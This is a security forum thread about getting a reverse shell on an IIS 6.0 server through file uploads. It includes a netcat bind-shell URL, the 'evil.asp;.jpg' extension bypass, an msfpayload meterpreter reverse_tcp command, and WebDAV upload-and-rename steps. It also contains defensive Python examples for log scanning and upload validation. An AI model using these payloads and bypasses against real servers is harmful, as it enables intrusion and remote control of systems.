
Reverse shell on IIS 6.0


mn_kthompson

Jr. Member

Posts: 58

Joined: Tue Sep 19, 2006 1:59 pm

Location: Mankato, MN

Post Tue Sep 18, 2007 11:17 am

Reverse shell on IIS 6.0

I'll try to keep the backstory short on this.  We have an outside vendor that has developed a web-based application for one of our departments.  The application allows the logged on user to upload files into a directory that is accessible to the web server.  In other words, you can upload a file, and then point your browser at that file.  We have some concerns about this, so I decided to set up a test machine to test a potential vulnerability. 

I have set up IIS 6.0 on a virtual machine running a fully patched evaluation version of Windows Server 2003 and I set some ridiculously wide open permissions on the folder and whipped up an ASP.NET application that lets an anonymous user upload any file to the wwwroot directory.  I have verified that I was able to upload cmd.exe and nc.exe to the wwwroot directory.

The problem is, I can't seem to do anything with those files that I uploaded.  I have made sure that everyone has execute permission on the wwwroot folder, but I still can't seem to get a reverse shell.  I can't even seem to get a directory listing.  I tried putting this into my browser:
  Code:
http://134.29.32.249/cmd.exe?dir+c:\

but I keep getting a page cannot be displayed error.  I also tried:
  Code:
http://134.29.32.249/nc.exe?-l+-p+1001+-e+cmd.exe

which also hasn't worked.  Does anyone know IIS well enough to tell me what I've done wrong here?  Is there some setting that I haven't opened up so that the web server can run the exe?  Is there something wrong with the http request that I've sent to the server?

LSOChris

Post Tue Sep 18, 2007 4:47 pm

Re: Reverse shell on IIS 6.0

try using the cmdasp.asp file

http://net-square.com/papers/one_way/one_way.html

it will execute as the IIS6 instance, so no SYSTEM privs but you should still be able to get a shell

rebrov

Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Sat Jun 12, 2010 2:26 am

Re: Reverse shell on IIS 6.0

ChrisG wrote: try using the cmdasp.asp file

http://net-square.com/papers/one_way/one_way.html

it will execute as the IIS6 instance, so no SYSTEM privs but you should still be able to get a shell


I was about to make a new thread asking how to do this exploit, how to get a shell on an IIS 6.0 server??

I tried to figure out the way on this site you mentioned, but no luck.

Is there any proper way to do it? I mean, more explanation from you?

KrisTeason

Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Sat Jun 12, 2010 11:43 am

Re: Reverse shell on IIS 6.0

Maybe this may help - it's directly from ChrisG's blog
http://carnal0wnage.blogspot.com/2010/05/more-with-metasploit-and-webdav.html
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP

rebrov

Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Sun Jun 13, 2010 7:47 pm

Re: Reverse shell on IIS 6.0

xXxKrisxXx wrote: Maybe this may help - it's directly from ChrisG's blog
http://carnal0wnage.blogspot.com/2010/05/more-with-metasploit-and-webdav.html


Thanks a lot for the info, and I want to ask some things:

I found a link on the same page leading to some tips useful to me, as follows:

$ cat happy.jpg evil.asp > "evil.asp;.jpg"

$ file "evil.asp;.jpg"
JPEG image data, JFIF standard 1.02

Now we upload our "evil.asp;.jpg" image to the web application. Since the extension ends in "jpg" and the contents of the file appear to be a valid JPEG, the web application accepts the file and renames it to "/images/evil.asp;.jpg"

At this part, after I created the fake jpg file to upload to the web server, as it's really an .asp script, but he said upload this file to the server??

1- How to upload the file to the server?
2- How to know that it takes this directory at the server, /images/?
3- And should I navigate to this directory location via browser? Or specific port via telnet?
4- What should I do if the server doesn't allow users to upload?

I hope you can answer these questions because it's going to enlighten me a lot.

Thanks in advance.

rebrov

Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Sun Jun 13, 2010 7:56 pm

Re: Reverse shell on IIS 6.0

I found it on the page:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.6.94 LPORT=443 R |
./msfencode -o tcp443meterp.asp
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)


upload it and rename it

dav:/davaroo/> put tcp443meterp.asp tcp443meterp.txt
Uploading tcp443meterp.asp to `/davaroo/tcp443meterp.txt':
Progress: [=============================>] 100.0% of 314810 bytes succeeded.
dav:/davaroo/> copy tcp443meterp.txt tcp443meterp.asp;.txt
Copying `/davaroo/tcp443meterp.txt' to `/davaroo/tcp443meterp.asp%3b.txt':  succeeded.
dav:/davaroo/> exit

He uploaded it to the server via what? Telnet? At the part:

dav:/davaroo/> put tcp443meterp.asp tcp443meterp.txt

Where do I type these commands? I don't understand this part clearly.
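For defenders reading this thread: the WebDAV put/copy sequence quoted above shows up in the IIS W3C log. The scanner below is an added example, not part of the original posts or the linked blog; the log lines, field order and the script-extension list are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Extensions handled by script engines on IIS (assumed list; extend as needed).
SCRIPT_EXT = r"\.(?:asp|aspx|asa|cer|cdx|ashx|asmx)"
# A script extension followed by ';' in the last path segment, e.g. "x.asp;.txt".
SEMICOLON_NAME = re.compile(SCRIPT_EXT + r";[^/]*$", re.IGNORECASE)
DAV_WRITE_METHODS = {"PUT", "COPY", "MOVE"}

# Constructed sample log; 192.0.2.x are documentation addresses.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2010-06-13 19:50:01 GET /default.aspx - 192.0.2.10 200
2010-06-13 19:50:07 PUT /davaroo/tcp443meterp.txt - 192.0.2.10 201
2010-06-13 19:50:09 COPY /davaroo/tcp443meterp.txt - 192.0.2.10 201
2010-06-13 19:50:15 GET /davaroo/tcp443meterp.asp%3b.txt - 192.0.2.10 200
2010-06-13 19:51:02 PUT /davaroo/notes.txt - 192.0.2.11 403
2010-06-13 19:52:40 GET /images/photo;1.jpg - 192.0.2.12 200
""".splitlines()

def parse_w3c(lines):
    """Yield one dict per request, named by the #Fields: directive."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def findings(lines):
    """Return (reason, method, path, client_ip) for each suspicious request."""
    out = []
    for rec in parse_w3c(lines):
        method = rec.get("cs-method", "").upper()
        path = unquote(rec.get("cs-uri-stem", ""))  # turns %3b back into ';'
        ip = rec.get("c-ip", "-")
        if SEMICOLON_NAME.search(path):
            out.append(("script-ext-before-semicolon", method, path, ip))
        elif method in DAV_WRITE_METHODS and rec.get("sc-status", "").startswith("2"):
            out.append(("webdav-write-succeeded", method, path, ip))
    return out

if __name__ == "__main__":
    for hit in findings(SAMPLE_LOG):
        print(*hit)
```

A COPY is logged with its source path only, because the destination travels in a request header, so the renamed file first appears in the log when it is requested.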

KrisTeason

Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Sun Jun 13, 2010 8:25 pm

Re: Reverse shell on IIS 6.0

He used a WebDAV client called cadaver to upload the file. He provides a reference link below in his blog, but you could get it here. You could use the WebDAV auxiliary modules to verify it's up and running.

To try to answer some of your questions above:
1- How to upload the file to the server?
A. If FTP allows anonymous access and allows you to upload files that'd be good. WebDav also allows you to upload files - look into cadaver.
2- How to know that it takes this directory at the server, /images/?
A. You could use a tool like nikto to find out what type of files are allowed to get uploaded. One of the webdav auxiliary modules may also give you some information regarding this.
3- And should I navigate to this directory location via browser? Or specific port via telnet?
A. Reference Answer 1.
4- What should I do if the server doesn't allow users to upload?
A. Try Harder™
Last edited by KrisTeason on Sun Jun 13, 2010 8:44 pm, edited 1 time in total.
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP

rebrov

Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Sun Jun 13, 2010 10:49 pm

Re: Reverse shell on IIS 6.0

What if WebDAV is disabled? I found many exploits, but most of them talk about exploiting via WebDAV.

But what if I can't via WebDAV because it's disabled?

LSOChris

Post Sat Jun 19, 2010 8:47 am

Re: Reverse shell on IIS 6.0

I've reread this post a few times to try to find the question, but I think you are asking about other ways to get files on the server.

Obviously the blog post is about exploiting WebDAV shares or writeable shares via normal Windows networking. You could also use some of those techniques if a site allows file uploads as well. The same caveats would *usually* apply, that you can't upload .exe or .asp(x) files; in that case the bypass method may still work for you.

hope that helps
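For the upload form that started this thread, the relevant control is how the handler names and validates what it stores. The sketch below is an added example, not code from any poster or from the vendor application; it contrasts the extension-plus-magic-bytes check that the quoted "evil.asp;.jpg" file passes with a stricter one, and its function names, allowlist and sample bytes are assumptions.

```python
import os
import re
import secrets

# Allowlisted extensions and the magic bytes their content must start with.
ALLOWED = {".jpg": b"\xff\xd8\xff", ".png": b"\x89PNG\r\n\x1a\n", ".gif": b"GIF8"}
# One base name, one dot, one short extension: no ';', spaces or extra dots.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]{0,63}\.[A-Za-z0-9]{1,5}")

# Constructed sample: JPEG header followed by inert placeholder text.
JPEG_HEAD = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"
POLYGLOT = JPEG_HEAD + b"[constructed placeholder for appended script text]"

def naive_accepts(filename, data):
    """Weak check: trusts the last extension and the leading magic bytes."""
    ext = os.path.splitext(filename)[1].lower()
    return ext in ALLOWED and data.startswith(ALLOWED[ext])

def hardened_store_name(filename, data):
    """Return a server-generated name to store the upload under, or None."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]  # drop any path part
    if not SAFE_NAME.fullmatch(base):
        return None
    ext = os.path.splitext(base)[1].lower()
    magic = ALLOWED.get(ext)
    if magic is None or not data.startswith(magic):
        return None
    # The client's name is discarded: the stored name has exactly one dot and
    # an allowlisted extension, so it cannot carry a script extension.
    return secrets.token_hex(16) + ext

if __name__ == "__main__":
    for name in ("happy.jpg", "evil.asp;.jpg", "cmd.exe"):
        print(name, naive_accepts(name, POLYGLOT), hardened_store_name(name, POLYGLOT))
```

Store the result outside the web root, or in a directory whose IIS execute permissions are set to None, so that stored files are only ever served as static content.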
